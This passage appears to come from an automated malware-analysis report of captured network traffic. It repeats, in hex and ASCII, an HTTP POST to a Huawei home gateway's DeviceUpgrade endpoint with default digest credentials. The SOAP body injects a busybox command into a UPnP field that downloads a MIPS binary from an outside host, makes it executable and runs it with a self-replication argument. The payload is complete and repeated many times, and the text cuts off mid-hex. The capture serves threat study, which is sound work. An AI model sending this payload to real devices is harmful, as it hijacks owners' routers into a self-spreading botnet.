61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 20 2d 6c 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 2d 72 20 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 3b 20 2f 74 6d 70 2f 61 73 63 61 72 69 73 2e 6d 69 70 73 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g amkbins.duckdns.org -l /tmp/ascaris.mips -r /bins/ascaris.mips; /bin/busybox chmod 777 * /tmp/ascaris.mips; /tmp/ascaris.mips huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 